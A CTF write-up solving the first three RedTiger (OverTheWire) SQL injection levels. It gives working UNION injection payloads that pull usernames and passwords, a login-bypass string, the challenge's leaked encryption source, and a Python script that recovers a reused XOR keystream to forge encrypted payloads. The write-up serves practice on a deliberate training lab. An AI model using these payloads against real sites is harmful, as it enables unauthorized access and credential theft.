My understanding of SQL injection still can't get to a higher level; all I can do is keep grinding through challenges to broaden my knowledge... in the end I'm still too much of a noob!!
level 1
http://redtiger.labs.overthewire.org/level1.php
Start by looking for an injection point. The "1" after Category: is a link; clicking it gives "cat=1".
So I started trying... and it turned out to be a plain numeric injection, with no need to close ' " ) etc., so just build the payload according to the hint and it works!
- order by
- get the flag
http://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
level 2
http://redtiger.labs.overthewire.org/level2.php
This one is also a fairly easy challenge.
The hint even says "A simple loginbypass".
So go straight for a universal password!
The universal username didn't work, so I tried the universal password instead, and that gave the flag.
username=admin&password=1'or 1=1#&login=Login
level 3
Hint: Try to get an error. Tablename: level3_users
Presumably it's error-based injection~
But that seemed to be the wrong approach... I tried for ages without getting anywhere, so I went to read someone's write-up, and only then learned that yes, you do need to trigger an error... but this error point is just too... Learned something new again~
Triggering the error: turn usr into an array and submit it.
The error is thrown as expected:
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25
Some background on .inc files:
A .inc file is, as the name suggests, an include file. The extension actually doesn't matter for file inclusion: you can include an asp file or a txt file just as well. We usually use inc as the extension simply because it shows what the file is for.
Then I downloaded the source:
```php
<?php
// warning! ugly code ahead :)
// encryption function
function encrypt($str)
{
    $cryptedstr = "";
    srand(3284724);                                       // fixed seed: rand() yields the same stream every call
    for ($i = 0; $i < strlen($str); $i++)
    {
        $temp = ord(substr($str, $i, 1)) ^ rand(0, 255);  // XOR each byte with one rand() byte
        while (strlen($temp) < 3)
        {
            $temp = "0" . $temp;                          // left-pad to a 3-digit decimal
        }
        $cryptedstr .= $temp . "";
    }
    return base64_encode($cryptedstr);
}
# decryption function
function decrypt($str)
{
    srand(3284724);
    if (preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', $str))     // passing an array as usr trips this call, hence the warning above
    {
        $str = base64_decode($str);
        if ($str != "" && $str != null && $str != false)
        {
            $decStr = "";
            for ($i = 0; $i < strlen($str); $i += 3)
            {
                $array[$i / 3] = substr($str, $i, 3);     // split back into 3-digit groups
            }
            foreach ($array as $s)
            {
                $a = $s ^ rand(0, 255);                   // numeric string XOR int gives an int
                $decStr .= chr($a);
            }
            return $decStr;
        }
        return false;
    }
    return false;
}
?>
```
With the encryption and decryption algorithm given, it becomes simple: same approach as level 1, and we can get the username and password.
But after encrypting my payloads the query just wouldn't return anything... I looked it up again... and learned that the encrypted strings differ between Windows and Linux: for the same srand() seed, rand() produces different numbers on Windows and Linux, so the encryption function only works on Linux. In the end I ran the encryption function inside docker and continued with the steps below.
# order by
original:
https://redtiger.labs.overthewire.org/level3.php?usr=Admin' order by 6
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMzMDY4MTc1MDg5
original:
https://redtiger.labs.overthewire.org/level3.php?usr=Admin' order by 7
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY4MTc1MDg5
# order by errors out, no idea why, but the union query works fine~~
# union to find the echoed columns
original:
https://redtiger.labs.overthewire.org/level3.php
?usr=' union select 1,2,3,4,5,6,7'
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDc2MTk0MDEzMTgyMTQxMjMxMjIzMDc1MTk5MTA5MTg0MTU5MDkzMjM5MDc4MDczMjM3MDc3MTc0MDcwMDU3MTk5MjM0MjE5MDgyMjQ2MTUzMjE5
# get the username and password
original:
https://redtiger.labs.overthewire.org/level3.php?usr=' union select 1,username,3,4,5,password,7 from level3_users where username='Admin
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDIwMjM4MDE1MTI3MTMzMTkwMTU0MDAxMjQ2MTU3MjA4MTc3MDk2MTI4MjIwMTE2MTIxMTYzMTQ5MjEzMTYwMTA4MDMyMjUyMjAzMDk3MTU2MTkwMTc1MDEzMTM5MDc4MTU1MDk2MDg1MTM0MTk3MTE5MDU5MTYzMTc4MDU2MDM3MDAzMTM2MDQ3MDY2MTA2MTE0MDQ2MjA2MTQ4MDcyMTQxMjE0MDc1MDQ0MjE1MjAzMDM3MDgyMTk4MDcyMTIzMjE1
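Because urlcrypt seeds rand() with a constant, every request is XORed with the same key stream, so the scheme is a reused one-time pad: a single known plaintext/ciphertext pair gives the stream away, and from then on you can encode and decode without reproducing PHP's rand() at all, which sidesteps the Windows/Linux rand() difference entirely. The Python below is an added example, not part of this write-up or of the challenge's code; it uses the level 3 ciphertexts listed above and assumes the first one encodes the plaintext "Admin' order by 6" exactly as listed.

```python
import base64

# Level 3 ciphertexts copied from the write-up above, with the plaintext the
# write-up gives for the first one (assumed to match byte for byte).
KNOWN_PT = "Admin' order by 6"
KNOWN_CT = ("MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0"
            "MTQyMDA5MTczMDA2MDY5MjMzMDY4MTc1MDg5")
ORDER_BY_7_CT = ("MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0"
                 "MTQyMDA5MTczMDA2MDY5MjMyMDY4MTc1MDg5")
# First 68 base64 chars (17 groups) of the "username and password" ciphertext above.
UNION_CT_PREFIX = "MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQz"


def ct_to_groups(ct):
    """Strip the container: base64 -> run of zero-padded 3-digit decimals."""
    raw = base64.b64decode(ct, validate=True).decode("ascii")
    if len(raw) % 3:
        raise ValueError("ciphertext body is not a multiple of 3 digits")
    return [int(raw[i:i + 3]) for i in range(0, len(raw), 3)]


def recover_keystream(pt, ct):
    """Known plaintext against a reused XOR stream: key[i] = pt[i] ^ ct[i].
    Only as many stream bytes as the known plaintext covers are recovered."""
    return [ord(c) ^ g for c, g in zip(pt, ct_to_groups(ct))]


def encrypt_with_stream(pt, key):
    """urlcrypt's encrypt(), with the recovered stream standing in for rand()."""
    if len(pt) > len(key):
        raise ValueError("plaintext longer than the recovered key stream")
    body = "".join("%03d" % (ord(c) ^ k) for c, k in zip(pt, key))
    return base64.b64encode(body.encode("ascii")).decode("ascii")


def decrypt_prefix(ct, key):
    """Decode as much of a ciphertext as the recovered stream reaches."""
    return "".join(chr(g ^ k) for g, k in zip(ct_to_groups(ct), key))


if __name__ == "__main__":
    key = recover_keystream(KNOWN_PT, KNOWN_CT)
    print("recovered stream:", key)
    # The "order by 7" encoding above must start with what we produce here.
    print(ORDER_BY_7_CT.startswith(encrypt_with_stream("Admin' order by 7", key)))
    print(decrypt_prefix(UNION_CT_PREFIX, key))
```

The two `order by` encodings above already show the tell: ciphertexts of equal-length plaintexts differ only where the plaintexts differ. The fix on the server side is a real cipher with a fresh per-message key or nonce, never a PRNG seeded with a constant.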